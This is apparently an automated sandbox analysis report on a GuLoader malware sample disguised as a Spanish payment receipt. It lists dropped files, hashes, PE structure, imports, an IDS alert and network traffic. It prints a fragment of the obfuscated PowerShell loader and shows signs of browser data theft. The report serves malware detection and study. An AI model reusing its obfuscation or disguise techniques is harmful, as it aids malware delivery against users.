Preview:	uuuuuuyuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuauu%.uuuuuuuu.u.uuuguuuuuuuuuuuuuuuuuuuuuuuuUuuuuuuuuuuOuuDuuuuuuuuuuuuuuu.uuuu.uuuuuubuuuukuuuuuuuuuuuuuuuduuuuuuuu}uuuuuuuu.uuuuuuuuuuuv.uuuuuuuuufuu.uuuuuuuuuuuuuu.uuuuuuuu~uuuuuu.uuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuuuuuu.uuuuu.uuu.uuuuu.uuuuuuuuuuuuuuuuuuuuuuu.uuu.uuuuuuuuuuuuuuu&uuu.uuu.uuuuuuuuuu.uuuuuuuuuu.uuu.uuuuuuu7uuuuu.uuuuuuuuuuuuuuuuHuuuuuRuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu/uuuuuuuuuuK.u.Huuuuuuuuuuuuuuuuuuuuu.uuuuuuu.uu.u#uuuuuuuuuuuuuuuuuuuuuuu.uuuuuuuuuuuuu.uuuuuuuuuuuuuu.uuuuuuuuuu.uuuuuuuuuuuu}uuuuuuuuu.uuuuuuuuuuu.uuuuuuuu.uuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuhu.uuuuuuuuu..uuuuu.uuuuuuuuuuuuu.uuu.uuuuuuuuuuuuu.uuuuuuuuuuuuuu.uuuuu.uuuuuu.uuuuuuuuuuuuuuuuuuuuuBuuuuu3uuuuuuuuuu.u.uuuuuuuuu.uuuuuuuu.uIuuuuuuuuuuuu.uuu.uuuuuuuu.$.uuuuuuuuuuuuuuLuuuuuuuuuuuuuuuuuuuuuu"uu=uuuuuuuu.uuuuuuu.uu.uuuuuuuuuuuuuuuuuuuuuuuu.uuuuu.u.uuu.uuuuuu.uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu.uuuuuu.u.uuuuuuuuuuuu.uuuuuuuuuuuuu.uuuuuuuuuuu.uuuuuuu

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Unicode text, UTF-8 text, with very long lines (3287), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53232
Entropy (8bit):	5.306622026877424
Encrypted:	false
SSDEEP:	768:iPi38zuk1tqO6kIRVOfsWD1psa71w+Mig6SR2hCWmm4oOr7G0ugpS12n:MAOlrJAOUCfj1w/ig6SR2uqOrbb
MD5:	550953A2F63ED2B48EBF6F76343105DC
SHA1:	F9425CAFC739B32C655B05AFDF9A5930337F2A54
SHA-256:	F4C99919EAF75B521F3E08EC3E4378CC546A07DE51735E48D7CF9110A4AFEC3C
SHA-512:	956BB1F66503873A3B721875123C485CA47E7F9F9CE14CE451A2A4B0F1C705B40774AC1569BDB41E83758E880586E1F7740598B3112744E0B68720AE4E0DEAB3
Malicious:	true
Preview:	$Facon=$Viste;........$Comped = @'.,yrsk. Kons$ metaE Gim,rMejeml Vandi ulpnRef rsAntev=Evadt$UsselM H,tcy Ung lC,ratdFonderSuppleRinkntTopcoi,insedReb cs KurvtGeni rWhencaSkidtfP eudi Ign kNonvakAfbeseDatannAl hu; agtv.TogstfTortiugr venCyclicRammetChikai SammoB skrn M,sk Pho aCo,ntrTall bArmate Sadojsti vd RecisNonalmSgn,di,nuden Tendi Bol.s Af lt Orphedeepmr L gniSaintePhoebrmedianU orueS mmesK,ska W cks(Tuesi$PiratPamouryRaa,flHjvanoGrandrtribuir gersMorgetstokkePr.ssnHelikoTeasasRootwiAfs nsKnick,Brnel$cha,tPSnottnDemo eFiguru sk rmudskioH emmnGabbioUnlo p aphee nterxUnconyHoved) Samd Husm{Godtg.masku.Egen $CagotV pat a,ylerrDosinmafstreGreenm rediaReubeaGene.l AnsteTorqurLucke Hom g(FreelLP ivaes.lidjOve leBicams nativGopheeFlersntykmld rage Umrke'.skerBDeflerSmaa,oOksehlOutecg.onde$lose S S ifkBudd rB,stvmNephr I akPGalva FredsMA baneLoz.ntLrerraSmaaty rigF smukuCowor. Fod,zGrnsaeSengelOstenOOtx,rvchaete Distr rancsIndbeoOverpDHousei Agersfibonc hustoHuzvar Konf Kjo P S p

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\regenereringens.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 641x75, components 3
Category:	dropped
Size (bytes):	11812
Entropy (8bit):	7.947325095143734
Encrypted:	false
SSDEEP:	192:LGpB8H5FjyifoM3ips5StnIq5fssf6MNZwNCa0x0mGKZXdS1+mRV4SFMlfGC:yp6H59yifX3LgqAlLNZwNe0mdc1+mkDn
MD5:	8145D5AFF0B7E710F7722BFBC4D642C3
SHA1:	AB79D97123A77B690671BDC5E177F6C34EB0686E
SHA-256:	EBEEB3C90990DEF0715C7AD916086760B7A48A3C68D927B72A6706BFC848D4DD
SHA-512:	39153A6B32E0B89EDA8A4EAC26058AFBA0DC94306DCAF94BD9D1D95BBAC12200F08CAA493B8394A0F0FD8CDF96F2812657DB65EAE814B3593B9F5AEC81B10D42
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......K...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..x...XI.sk\|...t....>.":5.z.a.\..+...u...?k..o..8L=k.jI..K...../k..o.../..\............p:.<z.}.z.6ut..).XO.T.b.q...=h.H..X....i...K.S..gU...G.G.rG\Q.T....~.Iu.3..H...H..8....O......=....G.'.G.q..'...G.$...__..9Y.}.}h.@..7.}?.?:p....../...>Vv>x....r.....T..F...X.Of.Vt.u'.+.]]..T.+p.h......R...d.A?.?:i....U...XwF..=i\|..X/.2..k...T+.A.<.....*..71.3..'4.t:Q .....

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\snild.txt

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	Generic INItialization configuration [OVERSLIPPED PACHYEMIA]
Category:	dropped
Size (bytes):	448
Entropy (8bit):	4.841570690161402
Encrypted:	false
SSDEEP:	12:xE/+SCPMQ6a1fDgy0iJEVqr2bMRJFv+8OgdDthj:jD6KrcimIzRJF2gHN
MD5:	CB0C5EAA7082E8658634531A5EEF4F58
SHA1:	6C1D5FA90EF28530E4BCFF744F3E27D035AD3194
SHA-256:	67553983E0385E5F132B85DA91C15F164A275409FBAE5AF892B673CE9CBE350E
SHA-512:	CE507F3953B0C20C520949AC3C2D68A7FA19540C1E1739BE0B03B395790093E1E80FF0DA03C43098DCF11763AE16DDFB43B4972354E40CCAC7EE9E7E826D42B1
Malicious:	false
Preview:	;copa sporvognskonduktrerne monosporangium,lithotritic endothelium kasseapparater bowstringed counterpoised prerejection ompolstring..;miljberedskabs milty trakkasseriet hypotrochanteric bronzemedaljens udledningen dementerings,phagosome jacarandi tituleringer..;streeking aabenbaringen betalingsreglerne tewly,twiddler karneval vrdsttelserne expatiates..[overstregedes netvrksadressens]..[OVERSLIPPED PACHYEMIA]..[UBETVIVLELIGE PALEOHERPETOLOGY]..

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\stdigeres.jpg

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 545x413, components 3
Category:	dropped
Size (bytes):	45620
Entropy (8bit):	7.975333434532706
Encrypted:	false
SSDEEP:	768:nmALp0uizgmT9hS9AsMXOpkOiaeOGaw7llfIzB9uFIF5yquPzSl1mD8Q8aq3dokh:nmICuiMG9hSKsGOJxlw7TQzB9uOF5JtN
MD5:	AFE667F9D1B6CA9E79E0F69C40EECCA9
SHA1:	6CCEA85C9A24086A0E44A3B2D18CDD55AC523DFD
SHA-256:	73B6E7E2168C91F3C91CB3FCC2B1C877404B6BC37F9C78DBCB91182BA6C51776
SHA-512:	8E7351D9DD61999FD333A5E859D27D3D5CC37800E5BBC2CAE300470E5BA6E06512EA012D26147A66082AA9CF8803E759277900E03AB3FFBDCA13CDEEB8BCC815
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........!.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..a`.H.=A.f].9".........`....6dT....\|.......i ..@Q..Q.[....N...#..qG.5..... (.....Y.m..9.E....=.Y..P..E`.J.5PZ...E:4d..5.&q.B.._cg.....dPq@....H..Z.?.>..=3S.E.d.x'..S..U._r..$[..{T......E..85R....m.'C.=*...<R....j`.p.......p0Z.3.Uk......).t.....]\........b^An.........u.I.....a..c5=.......o $.m.....Zrh..Y.n..I.H.#.....Z."K...t._.)Y..+.?D.Y.w.L.e.d..a..

C:\Users\user\AppData\Local\Temp\nsx731E.tmp

Download File

Process:	C:\Users\user\Desktop\comprobante de pago.exe
File Type:	data
Category:	dropped
Size (bytes):	1360248
Entropy (8bit):	5.594168097631149
Encrypted:	false
SSDEEP:	12288:Ca7FK6//h54f1NzE6B6Kwhv4IjNhOJbJt00jrIkhC6rlAyH:TFjpwI66Kev4IjNhOJbz00PIkhbhAyH
MD5:	E5BFE78E851ACF3BD2CA398D1540A87D
SHA1:	9B2D4FF8A576BA82E7B5CBBCE9E965EE31937D72
SHA-256:	45FE08F70601525440A2EA2A245A9A176A899CF607F687D2D8B641D3825AC710
SHA-512:	48620707B69F86E75DDF0741FAB36CCD44B4F05A294BD83AD227F8971787FBBE2DBC63C315D6171AE0E6DD02661B18C58D76716448B0B015DA34D45FD8C8083C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsx731E.tmp, Author: Joe Security
Preview:	.+......,...................M...H.......(+.......+..........................................................................................................................................................................................................................................G...U...........a...j...............................................................................................................................`.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LoggambirseaXxYCfnDSXQhemadynamic

Download File

Process:	C:\Windows\SysWOW64\dxdiag.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Download File

Process:	C:\Windows\SysWOW64\dxdiag.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1213059433085482
Encrypted:	false
SSDEEP:	384:KdM2qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:Kvq+n0E9ELyKOMq+8y9/Ow
MD5:	52AEDF324F11D74BC4F73AEF0E23C283
SHA1:	DEA533B547EABC60188397B8246E7FD5985E2D74
SHA-256:	8724C6792B6F4274CD459138FBCCE1C8BBB38A3D4DBF6508A5E0C5314BC01730
SHA-512:	5058C8351FBACEB3136978BC415A810ED2CEF5BA00B1342DEC6FDDFC8E9A301DBC775BA6EB5544E323003BA50F7B26BE95B48A3224616E0C7C896D3550E3BF34
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.574745660362048
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	comprobante de pago.exe
File size:	839'098 bytes
MD5:	969da5cc61a21e2d5fd00a52254ecd8e
SHA1:	3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
SHA256:	20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
SHA512:	6df74d8e45b5db927d8962e453f379b18ba79dce91a8e0677b55a36c1a57f38c43f677091d280d1abcbcad2b214299aeb02f2784047411e2d62a6e0912556e60
SSDEEP:	12288:1gP0I82X5K+GDnvy1eSLR0lUEkyZtyj6ittqTH3oEuprboHlExvyBBApy2HIxod3:EFJsDnylcpZk64oYEGc+yTARioCLC
TLSH:	B905126536C880D6C7A672FE79B3C7A29B16BC90E916E60733407A1F3E31255B607362
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..OP.._...P...s...P...V...P..Rich.P..........PE..L....z.W.................b...*.......3............@

File Icon


Icon Hash:	9c3e3b7b3f070643

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57017AB0 [Sun Apr 3 20:18:56 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ea4df5d94204fc550be1874e1b77ea7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007F3C2C7D6133h
push ebx
call 00007F3C2C7D928Ch
cmp eax, ebx
je 00007F3C2C7D6129h
push 00000C00h
call eax
mov esi, 004082B8h
push esi
call 00007F3C2C7D9206h
push esi
call dword ptr [0040815Ch]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F3C2C7D610Ch
push ebp
push 00000009h
call 00007F3C2C7D925Eh
push 00000007h
call 00007F3C2C7D9257h
mov dword ptr [0042A244h], eax
call dword ptr [0040803Ch]
push ebx
call dword ptr [004082A4h]
mov dword ptr [0042A2F8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
push 00429240h
call 00007F3C2C7D8E40h
call dword ptr [004080ACh]
mov ebp, 00435000h
push eax
push ebp
call 00007F3C2C7D8E2Eh
push ebx
call dword ptr [00408174h]
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x41000	0x21160	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615d	0x6200	c5c0065fc4c103ac2469dafdce131fb4	False	0.6616709183673469	data	6.45041359169741	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x13a4	0x1400	4ac891d4ddf58633f14436f9f80ac6b6	False	0.4529296875	data	5.163001655755973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20338	0x600	66b45fceba0f24d768fb09e0afe23c99	False	0.5026041666666666	data	3.9824009583068882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x16000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x41000	0x21160	0x21200	4d9f3e7db420ea387e39c8c514b9bfcc	False	0.33696196933962264	data	3.4012038863124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x413a0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2978084703655507
RT_ICON	0x51bc8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.3537430683918669
RT_ICON	0x57050	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.3423476617855456
RT_ICON	0x5b278	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.387448132780083
RT_ICON	0x5d820	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.39892120075046905
RT_ICON	0x5e8c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5002665245202559
RT_ICON	0x5f770	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.46885245901639344
RT_ICON	0x600f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.48826714801444043
RT_ICON	0x609a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.4441244239631336
RT_ICON	0x61068	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.305635838150289
RT_ICON	0x615d0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5274822695035462
RT_DIALOG	0x61a38	0x100	data	English	United States	0.5234375
RT_DIALOG	0x61b38	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x61c58	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x61d20	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x61d80	0xa0	data	English	United States	0.64375
RT_MANIFEST	0x61e20	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, WaitForSingleObject, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GetDiskFreeSpaceW, lstrlenW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-12T12:07:15.733632+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	49714	142.250.184.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 12, 2025 12:07:12.631258011 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:12.631328106 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:12.631395102 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:12.639512062 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:12.639533043 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:14.647670984 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:14.647821903 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:14.648793936 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:14.648858070 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:14.703630924 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:14.703653097 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:14.704082012 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:14.706481934 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:14.707920074 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:14.748366117 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:15.733669043 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:15.733745098 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:15.733881950 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:15.733881950 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:15.733987093 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:15.734008074 CET	443	49714	142.250.184.238	192.168.2.5
Mar 12, 2025 12:07:15.734040976 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:15.734067917 CET	49714	443	192.168.2.5	142.250.184.238
Mar 12, 2025 12:07:15.775460958 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:15.775490046 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:15.775573015 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:15.775849104 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:15.775866985 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:17.840996027 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:17.841098070 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:17.851161957 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:17.851188898 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:17.851450920 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:17.854511023 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:17.854969978 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:17.900333881 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.667007923 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.667212963 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.680334091 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.680464029 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.686783075 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.686892986 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.693645000 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.693743944 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.754844904 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.754906893 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.790221930 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.790283918 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.790307999 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.790357113 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.807379007 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.807435989 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.807451010 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.807507992 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.811347961 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.811420918 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.811434031 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.811479092 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.825512886 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.825571060 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.825596094 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.825643063 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.847110033 CET	443	49715	142.250.185.129	192.168.2.5
Mar 12, 2025 12:07:20.847182989 CET	49715	443	192.168.2.5	142.250.185.129
Mar 12, 2025 12:07:20.847193956 CET	443	49715	142.250.185.129	192.168.2.5
